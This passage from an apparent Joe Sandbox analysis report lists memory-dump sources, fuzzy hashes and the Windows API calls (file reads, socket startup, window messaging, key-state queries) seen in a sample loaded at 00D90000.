                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        • Opcode ID: d338f9e24ddd0f83d63cf505b3f6ae2dfafcdecf348885f2d578b2dd6de4ffe6
                                                                                                                        • Instruction ID: 9151d38833e8c04b56dc7346239abc408d97eca118bf821b53963ac742ea9418
                                                                                                                        • Opcode Fuzzy Hash: d338f9e24ddd0f83d63cf505b3f6ae2dfafcdecf348885f2d578b2dd6de4ffe6
                                                                                                                        • Instruction Fuzzy Hash: 1C118F3A205219DFDB10CF19C8809AA77E9FF49760B06816AEE498B355CB30AD408BB1
                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00D94E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00D94CF7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: e371e11ca02bcb1023acaa4e81a7cf8b93bb1de07ac4729f6dc5cfaea08cecd2
                                                                                                                        • Instruction ID: 3616cb60016a1de1aa2a334d6a565f4967164e8d1408e8916f6e646ed814d154
                                                                                                                        • Opcode Fuzzy Hash: e371e11ca02bcb1023acaa4e81a7cf8b93bb1de07ac4729f6dc5cfaea08cecd2
                                                                                                                        • Instruction Fuzzy Hash: 71117931202B049FDB20CF0AC880F66B7E9EF44314F14C51EE5AA86A52C7B1F846CB70
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                        • Instruction ID: 38901aea416aab1d85ef1fbff17a2698b7a4be8b6e7a691bd18f52aaa911dd63
                                                                                                                        • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                        • Instruction Fuzzy Hash: 19017CB9201502AFC705AB2CC991D39F7AAFF863507148159E469C7742DB30EC22CBF0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                        • Instruction ID: 4de306f34b13478711610510c218479b82665281c9c8bbc620c3d9daf2f604ce
                                                                                                                        • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                        • Instruction Fuzzy Hash: ED01A972210701AED7149B79C807A67BB98DF587A0F54C92EF95ACB1D1EB71E4008BB0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                        • Instruction ID: b51fcdba2d4c51e0988724e4dfdfcfcc9b03c5a157a53ec4a688dafb59026a9e
                                                                                                                        • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                        • Instruction Fuzzy Hash: 0C01D671104701EBCF21AFACD841A5BBBA8EF83360B14857EF89897291DB31E85587B5
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(00000000,?,00000000,?,?,?,00D95A39,?,?,?,-00000003,00000000,00000000), ref: 00D9514E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3964851224-0
                                                                                                                        • Opcode ID: 1b3df8a6492659ba150dbd6d2825873318d9f73574414a7d72c68b00eb2869be
                                                                                                                        • Instruction ID: 1857ea08661cfaff132a5b0430624f03a20beb52a3fef904a6ef9b7518b620d4
                                                                                                                        • Opcode Fuzzy Hash: 1b3df8a6492659ba150dbd6d2825873318d9f73574414a7d72c68b00eb2869be
                                                                                                                        • Instruction Fuzzy Hash: F7F0C275202B21ABCB125B15E80072AFB65EF40B61F04823AE44567654CB71D820C7F4
                                                                                                                        APIs
                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 00DE95C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Startup
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 724789610-0
                                                                                                                        • Opcode ID: f0c43777d3e5344ac0ecf1282ca9adf048b69645badfccdec0c62254c9414906
                                                                                                                        • Instruction ID: 10f8a1238afc1b802979da115b3d24b47ceabcc267201a9da60ad065fbc65bb7
                                                                                                                        • Opcode Fuzzy Hash: f0c43777d3e5344ac0ecf1282ca9adf048b69645badfccdec0c62254c9414906
                                                                                                                        • Instruction Fuzzy Hash: 7CE0E5332042146FC710EA64DC05AABB799FF85720F04875ABDA4872C1DA30D814C3E1
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00D934E2,?,00000001), ref: 00D93E6D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3664257935-0
                                                                                                                        • Opcode ID: b3248f9a07a819054090f5935bd276d3ddb0499dd75cfe44bca84858287088c3
                                                                                                                        • Instruction ID: 90e187009e2bff48ec0de6f91b97b136c611fa7430b04da05f26853eed935ac0
                                                                                                                        • Opcode Fuzzy Hash: b3248f9a07a819054090f5935bd276d3ddb0499dd75cfe44bca84858287088c3
                                                                                                                        • Instruction Fuzzy Hash: EEF01571505751DFCF349FA4D894852BBE1EF047193288A6EF1D682621C7319948DF20
                                                                                                                        APIs
                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00DD7A11
                                                                                                                          • Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FolderPath_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3334745507-0
                                                                                                                        • Opcode ID: d168851889feea25d5c67b9e7aa36842521e2271554985a7d84d9e12d5a575a4
                                                                                                                        • Instruction ID: e1b906033f5a9814fbb8724db5344f57969058f190b8de2ebde6c1b30a6dcd9e
                                                                                                                        • Opcode Fuzzy Hash: d168851889feea25d5c67b9e7aa36842521e2271554985a7d84d9e12d5a575a4
                                                                                                                        • Instruction Fuzzy Hash: 85D05EA65002282FDF50E6649C09DFB36ADC744104F0042A0786DD2042E920AE8586F0
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D91952
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSendTimeout
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1599653421-0
                                                                                                                        • Opcode ID: e5121d37c452a9e1ed062d0c4d36bec9d911e6f1a01419656261bbe7a401caf0
                                                                                                                        • Instruction ID: 8eae1a17b1816f8811a035a79612cfefd1552bb2347423130ac9034135da2374
                                                                                                                        • Opcode Fuzzy Hash: e5121d37c452a9e1ed062d0c4d36bec9d911e6f1a01419656261bbe7a401caf0
                                                                                                                        • Instruction Fuzzy Hash: B6D012F17942087EFB008B61CD07DFB775CD721F81F0086617E06D64D1D6649E098570
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D9193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D91952
                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DCE3AA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1777923405-0
                                                                                                                        • Opcode ID: 9f516dac4fd1550540522c67f5b24ac7278fe6adf5386baf6f625647503b42ca
                                                                                                                        • Instruction ID: 543aba84147a8a65153365cdd8aec958a247b84641ad0943dcca9ac10f3da27b
                                                                                                                        • Opcode Fuzzy Hash: 9f516dac4fd1550540522c67f5b24ac7278fe6adf5386baf6f625647503b42ca
                                                                                                                        • Instruction Fuzzy Hash: 44D01275144150AAFE706F15FC06FC17792DB40751F254459B581B70E9C6D25C415554
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: TextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 530164218-0
                                                                                                                        • Opcode ID: 37b426347d1dd42c90d6a7b0d1680cc40d828f6709b8161857e14a42e586139e
                                                                                                                        • Instruction ID: 302feed5b532e80b13904722e3475826146f97974519ce9749e5674473794891
                                                                                                                        • Opcode Fuzzy Hash: 37b426347d1dd42c90d6a7b0d1680cc40d828f6709b8161857e14a42e586139e
                                                                                                                        • Instruction Fuzzy Hash: 5CD09E362146149F8B01EF99DC44C8977E9FF4D7117018451F509DB231D621FC549B90
                                                                                                                        APIs
                                                                                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00E049DA,?,?,00000000), ref: 00D94FC4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        • Opcode ID: d7019d62d04f829189aeacb24cef9757f63af4195b2f2aa71dbd33daaf35d770
                                                                                                                        • Instruction ID: 4313125649f97736f055ac2740abb60abf1addcdc6d7ddde04f32f3756ce1703
                                                                                                                        • Opcode Fuzzy Hash: d7019d62d04f829189aeacb24cef9757f63af4195b2f2aa71dbd33daaf35d770
                                                                                                                        • Instruction Fuzzy Hash: 40D0C974740208BFEB00CB91DC46F9A7BBCEB04718F600194FA00A62D0D2F2BE448B55
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClearVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1473721057-0
                                                                                                                        • Opcode ID: 141edab667e2346fed8005cd2e4598315863ce01eab6f08513d4692ec7c421b7
                                                                                                                        • Instruction ID: 2e59441ac5ebc2d4f2ba12b9df9a8f47e597ac3c1fbcfda45805ea450386a640
                                                                                                                        • Opcode Fuzzy Hash: 141edab667e2346fed8005cd2e4598315863ce01eab6f08513d4692ec7c421b7
                                                                                                                        • Instruction Fuzzy Hash: 6DD0C9B1504200DBE7209F69E80478ABBE4AF95340F24C829E5D682550D7FAE8C69B22
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00D950BE,?,00D95088,?,00D9BE3D,00E522E8,?,00000000,?,00D93E2E,?,00000000,?), ref: 00D9510C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        • Opcode ID: 1b511ba42566f85fb19c61f2b3d5db1092378bee90890f0ce97d8eb8e55d4df6
                                                                                                                        • Instruction ID: bffda63074da9e7252e418343d775e121105bf0138c3b4b4634da8fb4a315bf7
                                                                                                                        • Opcode Fuzzy Hash: 1b511ba42566f85fb19c61f2b3d5db1092378bee90890f0ce97d8eb8e55d4df6
                                                                                                                        • Instruction Fuzzy Hash: B4E09275504B02DBC7324F1AA804452FBE5EFE13613258A2ED4E992664D7B0548A9BA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 00DFF64E
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DFF6AD
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00DFF6EA
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DFF711
                                                                                                                        • SendMessageW.USER32 ref: 00DFF737
                                                                                                                        • _wcsncpy.LIBCMT ref: 00DFF7A3
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00DFF7C4
                                                                                                                        • GetKeyState.USER32(00000009), ref: 00DFF7D1
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DFF7E7
                                                                                                                        • GetKeyState.USER32(00000010), ref: 00DFF7F1
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DFF820
                                                                                                                        • SendMessageW.USER32 ref: 00DFF843
                                                                                                                        • SendMessageW.USER32(?,00001030,?,00DFDE69), ref: 00DFF940
                                                                                                                        • SetCapture.USER32(?), ref: 00DFF970
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00DFF9D4
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00DFF9FA
                                                                                                                        • ReleaseCapture.USER32 ref: 00DFFA05
                                                                                                                        • GetCursorPos.USER32(?), ref: 00DFFA3A
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00DFFA47
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DFFAA9
                                                                                                                        • SendMessageW.USER32 ref: 00DFFAD3
